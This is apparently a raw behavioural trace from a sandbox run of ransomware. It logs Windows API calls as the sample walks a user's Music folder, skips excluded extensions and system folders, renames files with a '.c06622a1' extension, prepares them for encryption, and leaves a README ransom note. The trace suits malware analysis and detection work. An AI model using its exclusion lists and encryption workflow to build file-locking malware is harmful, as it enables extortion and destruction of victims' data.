[0160.457] wcslen (_String="prf") returned 0x3 [0160.457] _wcsicmp (_Str1="ps1", _Str2="wav") returned -7 [0160.457] wcslen (_String="ps1") returned 0x3 [0160.457] _wcsicmp (_Str1="rom", _Str2="wav") returned -5 [0160.457] wcslen (_String="rom") returned 0x3 [0160.457] _wcsicmp (_Str1="rtp", _Str2="wav") returned -5 [0160.457] wcslen (_String="rtp") returned 0x3 [0160.457] _wcsicmp (_Str1="scr", _Str2="wav") returned -4 [0160.457] wcslen (_String="scr") returned 0x3 [0160.458] _wcsicmp (_Str1="shs", _Str2="wav") returned -4 [0160.458] wcslen (_String="shs") returned 0x3 [0160.458] _wcsicmp (_Str1="spl", _Str2="wav") returned -4 [0160.458] wcslen (_String="spl") returned 0x3 [0160.458] _wcsicmp (_Str1="sys", _Str2="wav") returned -4 [0160.458] wcslen (_String="sys") returned 0x3 [0160.458] _wcsicmp (_Str1="theme", _Str2="wav") returned -3 [0160.458] wcslen (_String="theme") returned 0x5 [0160.458] _wcsicmp (_Str1="themepack", _Str2="wav") returned -3 [0160.458] wcslen (_String="themepack") returned 0x9 [0160.458] _wcsicmp (_Str1="wpx", _Str2="wav") returned 15 [0160.458] wcslen (_String="wpx") returned 0x3 [0160.458] _wcsicmp (_Str1="lock", _Str2="wav") returned -11 [0160.458] wcslen (_String="lock") returned 0x4 [0160.458] _wcsicmp (_Str1="key", _Str2="wav") returned -12 [0160.458] wcslen (_String="key") returned 0x3 [0160.458] _wcsicmp (_Str1="hta", _Str2="wav") returned -15 [0160.458] wcslen (_String="hta") returned 0x3 [0160.458] _wcsicmp (_Str1="msi", _Str2="wav") returned -10 [0160.458] wcslen (_String="msi") returned 0x3 [0160.458] _wcsicmp (_Str1="pdb", _Str2="wav") returned -7 [0160.458] wcslen (_String="pdb") returned 0x3 [0160.458] _wcsicmp (_Str1="sqlite", _Str2="wav") returned -4 [0160.458] wcslen (_String="sqlite") returned 0x6 [0160.458] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\Uulx-x\\lNiXwvZG3UHVD9Kw D Q" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\music\\uulx-x\\lnixwvzg3uhvd9kw d q")) returned 0x10 [0160.458] RtlAllocateHeap (HeapHandle=0x130000, Flags=0x0, Size=0x10000) returned 0x3272078 [0160.458] wcscpy (in: _Dest=0x3272078, _Source="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\Uulx-x\\lNiXwvZG3UHVD9Kw D Q" | out: _Dest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\Uulx-x\\lNiXwvZG3UHVD9Kw D Q") returned="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\Uulx-x\\lNiXwvZG3UHVD9Kw D Q" [0160.458] wcslen (_String="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\Uulx-x\\lNiXwvZG3UHVD9Kw D Q") returned 0x43 [0160.458] wcscpy (in: _Dest=0x3272100, _Source="XUJXgdHcT7y1.wav" | out: _Dest="XUJXgdHcT7y1.wav") returned="XUJXgdHcT7y1.wav" [0160.458] SetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\Uulx-x\\lNiXwvZG3UHVD9Kw D Q\\XUJXgdHcT7y1.wav", dwFileAttributes=0x80) returned 1 [0160.465] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\Uulx-x\\lNiXwvZG3UHVD9Kw D Q\\XUJXgdHcT7y1.wav" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\music\\uulx-x\\lnixwvzg3uhvd9kw d q\\xujxgdhct7y1.wav"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1ac [0160.465] SetFilePointerEx (in: hFile=0x1ac, liDistanceToMove=0xffffff70, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0160.465] ReadFile (in: hFile=0x1ac, lpBuffer=0x32e724, nNumberOfBytesToRead=0x90, lpNumberOfBytesRead=0x32e7b4, lpOverlapped=0x0 | out: lpBuffer=0x32e724*, lpNumberOfBytesRead=0x32e7b4*=0x90, lpOverlapped=0x0) returned 1 [0160.466] RtlComputeCrc32 (PartialCrc=0xbeef, Buffer=0x32e724, Length=0x80) returned 0xc32d6d66 [0160.466] RtlComputeCrc32 (PartialCrc=0x6d66, Buffer=0x32e724, Length=0x80) returned 0x8a79c243 [0160.466] RtlComputeCrc32 (PartialCrc=0xc243, Buffer=0x32e724, Length=0x80) returned 0xc1312f47 [0160.466] RtlComputeCrc32 (PartialCrc=0x2f47, Buffer=0x32e724, Length=0x80) returned 0x6ad1634a [0160.466] RtlComputeCrc32 (PartialCrc=0x634a, Buffer=0x32e724, Length=0x80) returned 0xcda94996 [0160.467] CloseHandle (hObject=0x1ac) returned 1 [0160.467] RtlAllocateHeap (HeapHandle=0x130000, Flags=0x0, Size=0x10000) returned 0x3282080 [0160.467] wcscpy (in: _Dest=0x3282080, _Source="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\Uulx-x\\lNiXwvZG3UHVD9Kw D Q\\XUJXgdHcT7y1.wav" | out: _Dest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\Uulx-x\\lNiXwvZG3UHVD9Kw D Q\\XUJXgdHcT7y1.wav") returned="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\Uulx-x\\lNiXwvZG3UHVD9Kw D Q\\XUJXgdHcT7y1.wav" [0160.467] wcslen (_String="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\Uulx-x\\lNiXwvZG3UHVD9Kw D Q\\XUJXgdHcT7y1.wav") returned 0x54 [0160.467] wcscpy (in: _Dest=0x3282128, _Source=".c06622a1" | out: _Dest=".c06622a1") returned=".c06622a1" [0160.467] MoveFileExW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\Uulx-x\\lNiXwvZG3UHVD9Kw D Q\\XUJXgdHcT7y1.wav" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\music\\uulx-x\\lnixwvzg3uhvd9kw d q\\xujxgdhct7y1.wav"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\Uulx-x\\lNiXwvZG3UHVD9Kw D Q\\XUJXgdHcT7y1.wav.c06622a1" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\music\\uulx-x\\lnixwvzg3uhvd9kw d q\\xujxgdhct7y1.wav.c06622a1"), dwFlags=0x8) returned 1 [0160.491] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\Uulx-x\\lNiXwvZG3UHVD9Kw D Q\\XUJXgdHcT7y1.wav.c06622a1" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\music\\uulx-x\\lnixwvzg3uhvd9kw d q\\xujxgdhct7y1.wav.c06622a1"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x48000000, hTemplateFile=0x0) returned 0x1f4 [0160.491] CreateIoCompletionPort (FileHandle=0x1f4, ExistingCompletionPort=0xd8, CompletionKey=0x0, NumberOfConcurrentThreads=0x0) returned 0xd8 [0160.491] RtlAllocateHeap (HeapHandle=0x130000, Flags=0x0, Size=0x80104) returned 0x2690020 [0160.499] RtlRandomEx (in: Seed=0xcb1018 | out: Seed=0xcb1018) returned 0x2d0e431d [0160.500] RtlRandomEx (in: Seed=0xcb1018 | out: Seed=0xcb1018) returned 0x3a50fcab [0160.500] RtlRandomEx (in: Seed=0xcb1018 | out: Seed=0xcb1018) returned 0x7766afc0 [0160.500] RtlRandomEx (in: Seed=0xcb1018 | out: Seed=0xcb1018) returned 0x6c8f2db0 [0160.500] RtlRandomEx (in: Seed=0xcb1018 | out: Seed=0xcb1018) returned 0x2196ad34 [0160.500] RtlRandomEx (in: Seed=0xcb1018 | out: Seed=0xcb1018) returned 0x2d208d07 [0160.500] RtlRandomEx (in: Seed=0xcb1018 | out: Seed=0xcb1018) returned 0x1bb7c38 [0160.500] RtlRandomEx (in: Seed=0xcb1018 | out: Seed=0xcb1018) returned 0x63e9ce5f [0160.503] RtlComputeCrc32 (PartialCrc=0xbeef, Buffer=0x2690094, Length=0x80) returned 0x331b814b [0160.503] RtlComputeCrc32 (PartialCrc=0x814b, Buffer=0x2690094, Length=0x80) returned 0xc380a095 [0160.503] RtlComputeCrc32 (PartialCrc=0xa095, Buffer=0x2690094, Length=0x80) returned 0x63d442d6 [0160.503] RtlComputeCrc32 (PartialCrc=0x42d6, Buffer=0x2690094, Length=0x80) returned 0x83a5335d [0160.503] RtlComputeCrc32 (PartialCrc=0x335d, Buffer=0x2690094, Length=0x80) returned 0xa7bd755d [0160.503] PostQueuedCompletionStatus (CompletionPort=0xd8, dwNumberOfBytesTransferred=0x0, dwCompletionKey=0x0, lpOverlapped=0x2690020) returned 1 [0160.503] RtlFreeHeap (HeapHandle=0x130000, Flags=0x0, BaseAddress=0x3272078) returned 1 [0160.504] RtlFreeHeap (HeapHandle=0x130000, Flags=0x0, BaseAddress=0x3282080) returned 1 [0160.505] FindNextFileW (in: hFindFile=0x1541c8, lpFindFileData=0x32e89c | out: lpFindFileData=0x32e89c*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0 [0160.505] FindClose (in: hFindFile=0x1541c8 | out: hFindFile=0x1541c8) returned 1 [0160.505] _wcsicmp (_Str1="backup", _Str2="lNiXwvZG3UHVD9Kw D Q") returned -10 [0160.505] wcslen (_String="backup") returned 0x6 [0160.505] _wcsicmp (_Str1="bak", _Str2="lNiXwvZG3UHVD9Kw D Q") returned -10 [0160.505] wcslen (_String="bak") returned 0x3 [0160.506] _wcsicmp (_Str1="back", _Str2="lNiXwvZG3UHVD9Kw D Q") returned -10 [0160.506] wcslen (_String="back") returned 0x4 [0160.506] _wcsicmp (_Str1="archive", _Str2="lNiXwvZG3UHVD9Kw D Q") returned -11 [0160.506] wcslen (_String="archive") returned 0x7 [0160.506] _wcsicmp (_Str1="bckp", _Str2="lNiXwvZG3UHVD9Kw D Q") returned -10 [0160.506] wcslen (_String="bckp") returned 0x4 [0160.506] RtlFreeHeap (HeapHandle=0x130000, Flags=0x0, BaseAddress=0x3240060) returned 1 [0160.508] RtlFreeHeap (HeapHandle=0x130000, Flags=0x0, BaseAddress=0x3250068) returned 1 [0160.508] FindNextFileW (in: hFindFile=0x154188, lpFindFileData=0x32eb1c | out: lpFindFileData=0x32eb1c*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x8cff8f40, ftCreationTime.dwHighDateTime=0x1d6eb2b, ftLastAccessTime.dwLowDateTime=0x8cff8f40, ftLastAccessTime.dwHighDateTime=0x1d6eb2b, ftLastWriteTime.dwLowDateTime=0x8cff8f40, ftLastWriteTime.dwHighDateTime=0x1d6eb2b, nFileSizeHigh=0x0, nFileSizeLow=0x7ca, dwReserved0=0x0, dwReserved1=0x0, cFileName="README.c06622a1.TXT", cAlternateFileName="README~1.TXT")) returned 1 [0160.508] _wcsicmp (_Str1="README.c06622a1.TXT", _Str2="README.c06622a1.TXT") returned 0 [0160.508] FindNextFileW (in: hFindFile=0x154188, lpFindFileData=0x32eb1c | out: lpFindFileData=0x32eb1c*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x6aabfa80, ftCreationTime.dwHighDateTime=0x1d5dcd8, ftLastAccessTime.dwLowDateTime=0xbc2f0be0, ftLastAccessTime.dwHighDateTime=0x1d5e2dc, ftLastWriteTime.dwLowDateTime=0xbc2f0be0, ftLastWriteTime.dwHighDateTime=0x1d5e2dc, nFileSizeHigh=0x0, nFileSizeLow=0x11e85, dwReserved0=0x0, dwReserved1=0x0, cFileName="rf10YNM.m4a", cAlternateFileName="")) returned 1 [0160.508] _wcsicmp (_Str1="rf10YNM.m4a", _Str2="README.c06622a1.TXT") returned 1 [0160.508] wcsstr (_Str="rf10YNM.m4a", _SubStr="README") returned 0x0 [0160.508] _wcsicmp (_Str1="autorun.inf", _Str2="rf10YNM.m4a") returned -17 [0160.508] wcslen (_String="autorun.inf") returned 0xb [0160.508] _wcsicmp (_Str1="boot.ini", _Str2="rf10YNM.m4a") returned -16 [0160.508] wcslen (_String="boot.ini") returned 0x8 [0160.508] _wcsicmp (_Str1="bootfont.bin", _Str2="rf10YNM.m4a") returned -16 [0160.508] wcslen (_String="bootfont.bin") returned 0xc [0160.508] _wcsicmp (_Str1="bootsect.bak", _Str2="rf10YNM.m4a") returned -16 [0160.508] wcslen (_String="bootsect.bak") returned 0xc [0160.508] _wcsicmp (_Str1="desktop.ini", _Str2="rf10YNM.m4a") returned -14 [0160.509] wcslen (_String="desktop.ini") returned 0xb [0160.509] _wcsicmp (_Str1="iconcache.db", _Str2="rf10YNM.m4a") returned -9 [0160.509] wcslen (_String="iconcache.db") returned 0xc [0160.509] _wcsicmp (_Str1="ntldr", _Str2="rf10YNM.m4a") returned -4 [0160.509] wcslen (_String="ntldr") returned 0x5 [0160.509] _wcsicmp (_Str1="ntuser.dat", _Str2="rf10YNM.m4a") returned -4 [0160.509] wcslen (_String="ntuser.dat") returned 0xa [0160.509] _wcsicmp (_Str1="ntuser.dat.log", _Str2="rf10YNM.m4a") returned -4 [0160.509] wcslen (_String="ntuser.dat.log") returned 0xe [0160.509] _wcsicmp (_Str1="ntuser.ini", _Str2="rf10YNM.m4a") returned -4 [0160.509] wcslen (_String="ntuser.ini") returned 0xa [0160.509] _wcsicmp (_Str1="thumbs.db", _Str2="rf10YNM.m4a") returned 2 [0160.509] wcslen (_String="thumbs.db") returned 0x9 [0160.509] _wcsicmp (_Str1="386", _Str2="m4a") returned -58 [0160.509] wcslen (_String="386") returned 0x3 [0160.509] _wcsicmp (_Str1="adv", _Str2="m4a") returned -12 [0160.509] wcslen (_String="adv") returned 0x3 [0160.509] _wcsicmp (_Str1="ani", _Str2="m4a") returned -12 [0160.509] wcslen (_String="ani") returned 0x3 [0160.509] _wcsicmp (_Str1="bat", _Str2="m4a") returned -11 [0160.509] wcslen (_String="bat") returned 0x3 [0160.509] _wcsicmp (_Str1="bin", _Str2="m4a") returned -11 [0160.509] wcslen (_String="bin") returned 0x3 [0160.509] _wcsicmp (_Str1="cab", _Str2="m4a") returned -10 [0160.510] wcslen (_String="cab") returned 0x3 [0160.510] _wcsicmp (_Str1="cmd", _Str2="m4a") returned -10 [0160.510] wcslen (_String="cmd") returned 0x3 [0160.510] _wcsicmp (_Str1="com", _Str2="m4a") returned -10 [0160.510] wcslen (_String="com") returned 0x3 [0160.510] _wcsicmp (_Str1="cpl", _Str2="m4a") returned -10 [0160.510] wcslen (_String="cpl") returned 0x3 [0160.510] _wcsicmp (_Str1="cur", _Str2="m4a") returned -10 [0160.510] wcslen (_String="cur") returned 0x3 [0160.510] _wcsicmp (_Str1="deskthemepack", _Str2="m4a") returned -9 [0160.510] wcslen (_String="deskthemepack") returned 0xd [0160.510] _wcsicmp (_Str1="diagcab", _Str2="m4a") returned -9 [0160.510] wcslen (_String="diagcab") returned 0x7 [0160.510] _wcsicmp (_Str1="diagcfg", _Str2="m4a") returned -9 [0160.510] wcslen (_String="diagcfg") returned 0x7 [0160.510] _wcsicmp (_Str1="diagpkg", _Str2="m4a") returned -9 [0160.510] wcslen (_String="diagpkg") returned 0x7 [0160.510] _wcsicmp (_Str1="dll", _Str2="m4a") returned -9 [0160.510] wcslen (_String="dll") returned 0x3 [0160.510] _wcsicmp (_Str1="drv", _Str2="m4a") returned -9 [0160.510] wcslen (_String="drv") returned 0x3 [0160.510] _wcsicmp (_Str1="exe", _Str2="m4a") returned -8 [0160.510] wcslen (_String="exe") returned 0x3 [0160.510] _wcsicmp (_Str1="hlp", _Str2="m4a") returned -5 [0160.510] wcslen (_String="hlp") returned 0x3 [0160.510] _wcsicmp (_Str1="icl", _Str2="m4a") returned -4 [0160.511] wcslen (_String="icl") returned 0x3 [0160.511] _wcsicmp (_Str1="icns", _Str2="m4a") returned -4 [0160.511] wcslen (_String="icns") returned 0x4 [0160.511] _wcsicmp (_Str1="ico", _Str2="m4a") returned -4 [0160.511] wcslen (_String="ico") returned 0x3 [0160.511] _wcsicmp (_Str1="ics", _Str2="m4a") returned -4 [0160.511] wcslen (_String="ics") returned 0x3 [0160.511] _wcsicmp (_Str1="idx", _Str2="m4a") returned -4 [0160.511] wcslen (_String="idx") returned 0x3 [0160.511] _wcsicmp (_Str1="ldf", _Str2="m4a") returned -1 [0160.511] wcslen (_String="ldf") returned 0x3 [0160.511] _wcsicmp (_Str1="lnk", _Str2="m4a") returned -1 [0160.511] wcslen (_String="lnk") returned 0x3 [0160.511] _wcsicmp (_Str1="mod", _Str2="m4a") returned 59 [0160.511] wcslen (_String="mod") returned 0x3 [0160.511] _wcsicmp (_Str1="mpa", _Str2="m4a") returned 60 [0160.511] wcslen (_String="mpa") returned 0x3 [0160.511] _wcsicmp (_Str1="msc", _Str2="m4a") returned 63 [0160.511] wcslen (_String="msc") returned 0x3 [0160.511] _wcsicmp (_Str1="msp", _Str2="m4a") returned 63 [0160.511] wcslen (_String="msp") returned 0x3 [0160.511] _wcsicmp (_Str1="msstyles", _Str2="m4a") returned 63 [0160.511] wcslen (_String="msstyles") returned 0x8 [0160.511] _wcsicmp (_Str1="msu", _Str2="m4a") returned 63 [0160.512] wcslen (_String="msu") returned 0x3 [0160.512] _wcsicmp (_Str1="nls", _Str2="m4a") returned 1 [0160.512] wcslen (_String="nls") returned 0x3 [0160.512] _wcsicmp (_Str1="nomedia", _Str2="m4a") returned 1 [0160.512] wcslen (_String="nomedia") returned 0x7 [0160.512] _wcsicmp (_Str1="ocx", _Str2="m4a") returned 2 [0160.512] wcslen (_String="ocx") returned 0x3 [0160.512] _wcsicmp (_Str1="prf", _Str2="m4a") returned 3 [0160.512] wcslen (_String="prf") returned 0x3 [0160.512] _wcsicmp (_Str1="ps1", _Str2="m4a") returned 3 [0160.512] wcslen (_String="ps1") returned 0x3 [0160.512] _wcsicmp (_Str1="rom", _Str2="m4a") returned 5 [0160.512] wcslen (_String="rom") returned 0x3 [0160.512] _wcsicmp (_Str1="rtp", _Str2="m4a") returned 5 [0160.512] wcslen (_String="rtp") returned 0x3 [0160.512] _wcsicmp (_Str1="scr", _Str2="m4a") returned 6 [0160.512] wcslen (_String="scr") returned 0x3 [0160.512] _wcsicmp (_Str1="shs", _Str2="m4a") returned 6 [0160.512] wcslen (_String="shs") returned 0x3 [0160.512] _wcsicmp (_Str1="spl", _Str2="m4a") returned 6 [0160.512] wcslen (_String="spl") returned 0x3 [0160.512] _wcsicmp (_Str1="sys", _Str2="m4a") returned 6 [0160.512] wcslen (_String="sys") returned 0x3 [0160.512] _wcsicmp (_Str1="theme", _Str2="m4a") returned 7 [0160.512] wcslen (_String="theme") returned 0x5 [0160.513] _wcsicmp (_Str1="themepack", _Str2="m4a") returned 7 [0160.513] wcslen (_String="themepack") returned 0x9 [0160.513] _wcsicmp (_Str1="wpx", _Str2="m4a") returned 10 [0160.513] wcslen (_String="wpx") returned 0x3 [0160.513] _wcsicmp (_Str1="lock", _Str2="m4a") returned -1 [0160.513] wcslen (_String="lock") returned 0x4 [0160.513] _wcsicmp (_Str1="key", _Str2="m4a") returned -2 [0160.513] wcslen (_String="key") returned 0x3 [0160.513] _wcsicmp (_Str1="hta", _Str2="m4a") returned -5 [0160.513] wcslen (_String="hta") returned 0x3 [0160.513] _wcsicmp (_Str1="msi", _Str2="m4a") returned 63 [0160.513] wcslen (_String="msi") returned 0x3 [0160.513] _wcsicmp (_Str1="pdb", _Str2="m4a") returned 3 [0160.513] wcslen (_String="pdb") returned 0x3 [0160.513] _wcsicmp (_Str1="sqlite", _Str2="m4a") returned 6 [0160.513] wcslen (_String="sqlite") returned 0x6 [0160.513] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\Uulx-x" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\music\\uulx-x")) returned 0x10 [0160.521] RtlAllocateHeap (HeapHandle=0x130000, Flags=0x0, Size=0x10000) returned 0x3240060 [0160.521] wcscpy (in: _Dest=0x3240060, _Source="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\Uulx-x" | out: _Dest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\Uulx-x") returned="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\Uulx-x" [0160.521] wcslen (_String="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\Uulx-x") returned 0x2e [0160.521] wcscpy (in: _Dest=0x32400be, _Source="rf10YNM.m4a" | out: _Dest="rf10YNM.m4a") returned="rf10YNM.m4a" [0160.521] SetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\Uulx-x\\rf10YNM.m4a", dwFileAttributes=0x80) returned 1 [0160.552] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\Uulx-x\\rf10YNM.m4a" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\music\\uulx-x\\rf10ynm.m4a"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1e4 [0160.552] SetFilePointerEx (in: hFile=0x1e4, liDistanceToMove=0xffffff70, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0160.552] ReadFile (in: hFile=0x1e4, lpBuffer=0x32e9a4, nNumberOfBytesToRead=0x90, lpNumberOfBytesRead=0x32ea34, lpOverlapped=0x0 | out: lpBuffer=0x32e9a4*, lpNumberOfBytesRead=0x32ea34*=0x90, lpOverlapped=0x0) returned 1 [0160.553] RtlComputeCrc32 (PartialCrc=0xbeef, Buffer=0x32e9a4, Length=0x80) returned 0xc870e95a [0160.553] RtlComputeCrc32 (PartialCrc=0xe95a, Buffer=0x32e9a4, Length=0x80) returned 0x21e0719c [0160.553] RtlComputeCrc32 (PartialCrc=0x719c, Buffer=0x32e9a4, Length=0x80) returned 0x55a19546 [0160.553] RtlComputeCrc32 (PartialCrc=0x9546, Buffer=0x32e9a4, Length=0x80) returned 0xd8eb132a [0160.553] RtlComputeCrc32 (PartialCrc=0x132a, Buffer=0x32e9a4, Length=0x80) returned 0x83176712 [0160.553] CloseHandle (hObject=0x1e4) returned 1 [0160.553] RtlAllocateHeap (HeapHandle=0x130000, Flags=0x0, Size=0x10000) returned 0x3250068 [0160.553] wcscpy (in: _Dest=0x3250068, _Source="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\Uulx-x\\rf10YNM.m4a" | out: _Dest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\Uulx-x\\rf10YNM.m4a") returned="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\Uulx-x\\rf10YNM.m4a" [0160.553] wcslen (_String="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\Uulx-x\\rf10YNM.m4a") returned 0x3a [0160.553] wcscpy (in: _Dest=0x32500dc, _Source=".c06622a1" | out: _Dest=".c06622a1") returned=".c06622a1" [0160.553] MoveFileExW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\Uulx-x\\rf10YNM.m4a" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\music\\uulx-x\\rf10ynm.m4a"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\Uulx-x\\rf10YNM.m4a.c06622a1" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\music\\uulx-x\\rf10ynm.m4a.c06622a1"), dwFlags=0x8) returned 1 [0160.578] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\Uulx-x\\rf10YNM.m4a.c06622a1" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\music\\uulx-x\\rf10ynm.m4a.c06622a1"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x48000000, hTemplateFile=0x0) returned 0x1e4 [0160.578] CreateIoCompletionPort (FileHandle=0x1e4, ExistingCompletionPort=0x130, CompletionKey=0x0, NumberOfConcurrentThreads=0x0) returned 0x130 [0160.578] RtlAllocateHeap (HeapHandle=0x130000, Flags=0x0, Size=0x80104) returned 0x710020 [0160.582] RtlRandomEx (in: Seed=0xcb1018 | out: Seed=0xcb1018) returned 0x20d11266 [0160.582] RtlRandomEx (in: Seed=0xcb1018 | out: Seed=0xcb1018) returned 0x72ec0857 [0160.582] RtlRandomEx (in: Seed=0xcb1018 | out: Seed=0xcb1018) returned 0x2759542e [0160.582] RtlRandomEx (in: Seed=0xcb1018 | out: Seed=0xcb1018) returned 0x1669d2c8 [0160.582] RtlRandomEx (in: Seed=0xcb1018 | out: Seed=0xcb1018) returned 0xf03bc09 [0160.582] RtlRandomEx (in: Seed=0xcb1018 | out: Seed=0xcb1018) returned 0x4b06db78 [0160.582] RtlRandomEx (in: Seed=0xcb1018 | out: Seed=0xcb1018) returned 0x32105382 [0160.582] RtlRandomEx (in: Seed=0xcb1018 | out: Seed=0xcb1018) returned 0x13a2e5ba [0160.585] RtlComputeCrc32 (PartialCrc=0xbeef, Buffer=0x710094, Length=0x80) returned 0x403646e6 [0160.585] RtlComputeCrc32 (PartialCrc=0x46e6, Buffer=0x710094, Length=0x80) returned 0x4339ac5 [0160.585] RtlComputeCrc32 (PartialCrc=0x9ac5, Buffer=0x710094, Length=0x80) returned 0x1bb77f59 [0160.585] RtlComputeCrc32 (PartialCrc=0x7f59, Buffer=0x710094, Length=0x80) returned 0x8ca82778 [0160.585] RtlComputeCrc32 (PartialCrc=0x2778, Buffer=0x710094, Length=0x80) returned 0xafe3c8f3 [0160.585] PostQueuedCompletionStatus (CompletionPort=0x130, dwNumberOfBytesTransferred=0x0, dwCompletionKey=0x0, lpOverlapped=0x710020) returned 1 [0160.586] RtlFreeHeap (HeapHandle=0x130000, Flags=0x0, BaseAddress=0x3240060) returned 1 [0160.586] RtlFreeHeap (HeapHandle=0x130000, Flags=0x0, BaseAddress=0x3250068) returned 1 [0160.586] FindNextFileW (in: hFindFile=0x154188, lpFindFileData=0x32eb1c | out: lpFindFileData=0x32eb1c*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x73382c80, ftCreationTime.dwHighDateTime=0x1d5e3d8, ftLastAccessTime.dwLowDateTime=0xda56320, ftLastAccessTime.dwHighDateTime=0x1d5df09, ftLastWriteTime.dwLowDateTime=0xda56320, ftLastWriteTime.dwHighDateTime=0x1d5df09, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="WvRAl", cAlternateFileName="")) returned 1 [0160.586] _wcsicmp (_Str1="$recycle.bin", _Str2="WvRAl") returned -83 [0160.586] wcslen (_String="$recycle.bin") returned 0xc [0160.586] _wcsicmp (_Str1="config.msi", _Str2="WvRAl") returned -20 [0160.586] wcslen (_String="config.msi") returned 0xa [0160.586] _wcsicmp (_Str1="$windows.~bt", _Str2="WvRAl") returned -83 [0160.586] wcslen (_String="$windows.~bt") returned 0xc [0160.586] _wcsicmp (_Str1="$windows.~ws", _Str2="WvRAl") returned -83 [0160.586] wcslen (_String="$windows.~ws") returned 0xc [0160.586] _wcsicmp (_Str1="windows", _Str2="WvRAl") returned -13 [0160.586] wcslen (_String="windows") returned 0x7 [0160.586] _wcsicmp (_Str1="appdata", _Str2="WvRAl") returned -22 [0160.586] wcslen (_String="appdata") returned 0x7 [0160.586] _wcsicmp (_Str1="application data", _Str2="WvRAl") returned -22 [0160.586] wcslen (_String="application data") returned 0x10 [0160.586] _wcsicmp (_Str1="boot", _Str2="WvRAl") returned -21 [0160.586] wcslen (_String="boot") returned 0x4 [0160.586] _wcsicmp (_Str1="google", _Str2="WvRAl") returned -16 [0160.586] wcslen (_String="google") returned 0x6 [0160.586] _wcsicmp (_Str1="mozilla", _Str2="WvRAl") returned -10 [0160.586] wcslen (_String="mozilla") returned 0x7 [0160.586] _wcsicmp (_Str1="program files", _Str2="WvRAl") returned -7 [0160.586] wcslen (_String="program files") returned 0xd [0160.586] _wcsicmp (_Str1="program files (x86)", _Str2="WvRAl") returned -7 [0160.586] wcslen (_String="program files (x86)") returned 0x13 [0160.586] _wcsicmp (_Str1="programdata", _Str2="WvRAl") returned -7 [0160.586] wcslen (_String="programdata") returned 0xb [0160.586] _wcsicmp (_Str1="system volume information", _Str2="WvRAl") returned -4 [0160.586] wcslen (_String="system volume information") returned 0x19 [0160.586] _wcsicmp (_Str1="tor browser", _Str2="WvRAl") returned -3 